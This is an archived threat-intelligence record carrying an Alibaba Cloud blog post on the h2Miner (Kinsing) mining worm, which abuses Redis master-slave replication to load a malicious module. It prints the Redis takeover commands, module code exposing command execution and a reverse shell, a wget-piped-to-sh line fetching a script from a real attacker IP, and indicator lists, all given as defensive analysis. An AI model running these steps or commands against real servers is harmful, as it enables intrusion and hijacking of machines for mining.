{
	"id": "1a68a49d-ac47-4fc9-8d1c-4dff68e23df2",
	"created_at": "2026-04-06T00:11:20.313588Z",
	"updated_at": "2026-04-10T13:12:31.912138Z",
	"deleted_at": null,
	"sha1_hash": "f8844496106c0bc3ca8793e9972a534742c1f827",
	"title": "New Outbreak of h2Miner Worms Exploiting Redis RCE Detected",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 646759,
	"plain_text": "New Outbreak of h2Miner Worms Exploiting Redis RCE Detected\r\nArchived: 2026-04-05 12:53:47 UTC\r\n  Intl - English\r\n  Cart\r\nConsole\r\nAccount Management\r\nLogout\r\nLog In\r\nFree Account\r\nFree Account\r\nConsole\r\nCommunity Blog New Outbreak of h2Miner Worms Exploiting Redis RCE Detected\r\nNew Outbreak of h2Miner Worms Exploiting Redis RCE Detected\r\nIn this post, we'll discuss the recent outbreak of h2Miner worms, which exploit Redis's Remote Command\r\nExecution (RCE), and also share some useful security tips by the Alibaba Cloud Security team.\r\nBy Cang Po, with special thanks to Sang Duo.\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 1 of 8\n\nRecently, Alibaba Cloud's security team detected a sudden outbreak of h2Miner mining botnet worms. This type\r\nof malicious worm uses unauthorized or weak passwords for Redis as gateways to your systems, then\r\nsynchronizes its own malicious module with that of an associated server through master-slave synchronization,\r\nand finally loads this malicious module on the target machine and executes malicious instructions.\r\nIn the past, attacks to your systems were mainly done through a method that involved scheduled tasks or SSH\r\nkeys that were written to your target machine after the attacker logs into Redis. Fortunately, this method often\r\ndoesn't succeed to penetrate your system due to permission control or system versioning complications.\r\nNonetheless, this loading module method can directly execute arbitrary instructions or obtain the relevant shell\r\ninteractive environment, which is harmful to your system.\r\nDue to the large number of Redis systems hosted online (nearly 1 million), Alibaba Cloud's security team, as a\r\nfriendly reminder to our customers, recommends that users do not expose their Redis service to the public network\r\nand check the strength of their passwords regularly and also check whether they are affected by worms in a timely\r\nmanner.\r\nOf course, another effective means of protecting your systems is to purchase some of the relevant security\r\nproducts and services from Alibaba Cloud's large portfolio of security products and solutions to prevent further\r\nmalicious attacks. Some of our most popular products include our Anti-DDoS product packages, such as Anti-DDoS Basic, Anti-DDoS Pro and Anti-DDoS Premium packages, as well as our Web Application Firewall. You\r\ncan contact our sales team to learn which security products are suitable for your needs.\r\nH2Miner Gang\r\nh2Miner is a mining botnet under Linux, which can invade your system through various different means including\r\nthe hadoop yarn unauthorized vulnerability, the vulnerability that involves unauthorized access to Docker, and\r\nRedis's Remote Command Execution (RCE) vulnerability. The mining botnet works by downloading malicious\r\nscripts and malicious programs for mining your precious data, horizontal scanning expansion Attack surface and\r\nmaintain Command and Control (C\u0026C) communication.\r\nRedis RCE\r\nKnowledge of this issues was shared by Pavel Toporkov at ZeroNights 2018. After version 4.0, Redis supports the\r\nfunction of loading external modules, which provides users with the option for loading so files compiled with C in\r\nRedis to achieve specific Redis commands. This function although useful, introduced a vulnerability, where, in\r\nRedis master-slave mode, files could be synchronized to the slave through the fullresync mode to complete the\r\ntransmission of malicious so files. After completing the transfer, the attackers load module on the target Redis and\r\nexecute any instruction.\r\nWorm Analysis\r\nRecently, the Alibaba Cloud security team discovered that the size of the h2Miner group suddenly increased\r\nsharply. According to their analysis, the overall process of how an attack occurs is as follows:\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 2 of 8\n\nh2Miner mainly uses Redis's RCE to complete the intrusion. First, attackers use unauthorized or weak passwords\r\nto gain access to Redis servers. Then, they use config set dbfilename red2.so to modify the save file name.\r\nAfter that, attackers use the slaveof command to set the host address of the master-slave replication. When the\r\ntarget Redis service establishes a master-slave connection with the malicious Redis service owned by the attacker,\r\nthe attacker controls the malicious Redis to send fullresync command for file synchronization, then the\r\nred2.so file will be written on the target machine. After this, attackers use module load ./red2.so to load this\r\nso file. This module can execute arbitrary instructions or initiate a reverse connection to obtain the shell\r\nenvironment according to the parameters passed in.\r\n if (RedisModule_CreateCommand(ctx, \"system.exec\",\r\n DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\r\n return REDISMODULE_ERR;\r\n if (RedisModule_CreateCommand(ctx, \"system.rev\",\r\n RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\r\n return REDISMODULE_ERR;\r\nAfter executing a malicious instruction such as / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh\u003e\r\n/ dev / null 2\u003e \u0026 1 , the attacker will reset the backup file name and use module unload to unload the system\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 3 of 8\n\nmodule to clear the corresponding traces. However, the red2.so file still remains on the attacked host. Users are\r\nadvised to pay attention to whether there is such a suspicious file in their Redis service directory.\r\nIn addition to killing some malicious processes to steal resources, the attacker followed up the malicious script by\r\ndownloading and running malicious binary files to http://142.44.191.122/kinsing . This means that the process\r\nname or directory name containing kinsing on the host may indicate that this machine has been infected by the\r\nworm.\r\nAccording to the results of the simple reverse analysis, the malicious program mainly has the following functions:\r\nDownload the file and execute\r\nExecute the mining program\r\nMaintain C\u0026C communication and execute commands\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 4 of 8\n\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 5 of 8\n\nUse masscan to scan externally to expand the influence. In addition, the IP address of the C\u0026C server is hard-coded in the program, and the affected host will communicate with the C\u0026C communication server in the form of\r\nHTTP, where the information of the zombie (hacked server) is identified in the HTTP header.\r\nGET /h HTTP/1.1\r\nHost: 91.215.169.111\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.10\r\nArch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\nOsversion: 10.0\r\nRoot: false\r\nS: k\r\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\nAccept-Encoding: gzip\r\nOther Attack Methods\r\nNo. Vulnerabilities\r\n1 Solr dataimport RCE(CVE-2019-0193)\r\n2 Hadoop Yarn REST API Unauthorized RCE (CVE-2017-15718)\r\n3 Docker Remote API Unauthorized RCE\r\n4 ThinkPHP5 Global Variable Override RCE\r\n5 Confluence Unauthorized RCE (CVE-2019-3396)\r\nIOC\r\n/kinsing\r\n142.44.191.122/t.sh\r\n185.92.74.42/h.sh\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 6 of 8\n\n142.44.191.122/spr.sh\r\n142.44.191.122/spre.sh\r\n195.3.146.118/unk.sh\r\nc\u0026c\r\n45.10.88.102\r\n91.215.169.111\r\n139.99.50.255\r\n46.243.253.167\r\n195.123.220.193\r\nSecurity Advice\r\nTo our customers, we have the following recommendations. First, Redis should not be exposed to the Internet and\r\nshould be secured with a strong password. Next, it is important the customers check whether the red2.so file is left\r\nin the Redis path or the file name/process name on the host contains kinsing\r\nYou may also like\r\nComments\r\nRelated Products\r\n WAF(Web Application Firewall)\r\nA cloud firewall service utilizing big data capabilities to protect against web-based attacks\r\nLearn More\r\n Web Hosting Solution\r\nExplore Web Hosting solutions that can power your personal website or empower your online business.\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 7 of 8\n\nLearn More\r\n Managed Security Service\r\nIdentify vulnerabilities and improve security management of Alibaba Cloud WAF and Anti-DDoS and with\r\na fully managed security service\r\nLearn More\r\n Tair (Redis® OSS-Compatible)\r\nA key value database service that offers in-memory caching and high-speed access to applications hosted\r\non the cloud\r\nLearn More\r\nSource: https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nhttps://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743"
	],
	"report_names": [
		"new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743"
	],
	"threat_actors": [
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434280,
	"ts_updated_at": 1775826751,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.pdf",
		"text": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.txt",
		"img": "https://archive.orkl.eu/f8844496106c0bc3ca8793e9972a534742c1f827.jpg"
	}
}